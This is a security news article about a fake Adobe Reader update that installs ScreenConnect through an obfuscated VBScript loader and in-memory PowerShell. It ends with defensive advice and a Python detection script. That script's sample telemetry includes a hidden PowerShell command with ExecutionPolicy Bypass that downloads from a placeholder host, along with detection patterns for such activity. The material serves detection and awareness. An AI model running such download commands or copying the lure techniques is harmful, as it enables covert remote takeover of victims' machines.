A newly identified cyber attack is deceiving users into downloading remote access software disguised as an Adobe Acrobat Reader update. This sophisticated campaign employs in-memory execution and other advanced techniques to install ConnectWise’s ScreenConnect tool without leaving clear signs on the victim’s computer.
Trust Exploitation in Software Downloads
The attackers capitalize on the trust users place in reputable software brands like Adobe. When users encounter a familiar download button, they often proceed without hesitation. This campaign takes advantage of that trust by delivering a fake installer that actually pushes a heavily obfuscated VBScript file named Acrobat_Reader_V112_6971.vbs.
Researchers from Zscaler ThreatLabz first uncovered this campaign in February 2026, tracing the attack from its initial lure to the final deployment of ScreenConnect. Analyst Kaivalya Khursale noted the use of multiple obfuscation layers and direct in-memory execution, which complicates detection and forensic analysis.
Details of the Attack Strategy
This campaign is notable for abusing a legitimate remote monitoring and management (RMM) tool. ScreenConnect is widely used by IT professionals, but when it is installed without the user’s consent it grants attackers full remote control over the compromised machine.
The fraudulent website hosting this attack mimics Adobe’s official site, initiating an automatic download upon visit. The initial VBScript loader, once activated, operates almost entirely in memory to avoid leaving forensic evidence.
In a carefully orchestrated sequence, the attack begins with the VBScript file, which resists analysis by dynamically constructing its system object references at run time. The loader then executes commands silently, using PowerShell to download additional files and run them entirely in memory.
Countermeasures and Recommendations
The security community recommends avoiding software downloads from unofficial sources, even when they appear legitimate. Organizations should use application whitelisting to block unauthorized RMM tools and monitor for unusual PowerShell activity, in particular invocations that use the ExecutionPolicy Bypass flag.
Security teams are advised to alert on unexpected MSI installations and block access to untrusted file-hosting URLs initiated by scripts. Enhanced EDR solutions should be enabled to detect Process Environment Block (PEB) manipulation and COM-based UAC bypass activities.
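As an added illustration (not code from the article or from Zscaler ThreatLabz), the detection points listed above expressed as rules over process-creation telemetry; the event fields, rule names, allow-listed parents and sample command lines are constructed assumptions, and the sample rows are invented, not captured from the campaign.

```python
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "msiexec.exe"}
# Parents from which an msiexec.exe launch is considered expected (assumption for this example).
EXPECTED_MSI_PARENTS = {"explorer.exe", "services.exe"}
# Matches "-ExecutionPolicy Bypass" and the abbreviated "-ep bypass" form, case-insensitively.
EP_BYPASS = re.compile(r"-(?:ExecutionPolicy|ep)\s+bypass", re.IGNORECASE)
# Any http(s) URL inside a command line launched from a script host counts as a script-initiated fetch.
URL = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)

@dataclass
class ProcEvent:
    parent: str   # parent image name, e.g. wscript.exe
    image: str    # image name of the newly created process
    cmdline: str  # full command line of the new process

def detect(events):
    """Return (rule_name, event_index) findings for the indicators the article recommends monitoring."""
    findings = []
    for i, ev in enumerate(events):
        parent, image = ev.parent.lower(), ev.image.lower()
        if image in {"powershell.exe", "pwsh.exe"} and EP_BYPASS.search(ev.cmdline):
            findings.append(("powershell_execution_policy_bypass", i))
        if parent in SCRIPT_HOSTS and image in INTERPRETERS:
            findings.append(("script_host_spawned_interpreter", i))
            if URL.search(ev.cmdline):
                findings.append(("script_initiated_download", i))
        if image == "msiexec.exe" and parent not in EXPECTED_MSI_PARENTS:
            findings.append(("unexpected_msi_install", i))
    return findings

# Constructed sample telemetry: a script-host chain like the one described, plus two benign admin actions.
SAMPLE = [
    ProcEvent("explorer.exe", "wscript.exe", r'wscript.exe "C:\Users\u\Downloads\Acrobat_Reader_V112_6971.vbs"'),
    ProcEvent("wscript.exe", "powershell.exe",
              "powershell.exe -W Hidden -ExecutionPolicy Bypass -c \"iwr https://files.example.invalid/x\""),
    ProcEvent("powershell.exe", "msiexec.exe", r"msiexec.exe /i C:\Users\u\AppData\Local\Temp\setup.msi /qn"),
    ProcEvent("explorer.exe", "powershell.exe", r"powershell.exe -File C:\scripts\backup.ps1"),
    ProcEvent("services.exe", "msiexec.exe", "msiexec.exe /V"),
]

if __name__ == "__main__":
    for rule, idx in detect(SAMPLE):
        print(f"{rule}: {SAMPLE[idx].parent} -> {SAMPLE[idx].image}")
```

The benign rows produce no findings, while the script-host chain trips all four rules, which is the overlap a SOC would correlate into a single alert.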
In conclusion, while the use of legitimate tools like ScreenConnect makes detection challenging, awareness and proactive security measures can mitigate the risks associated with such deceptive campaigns.
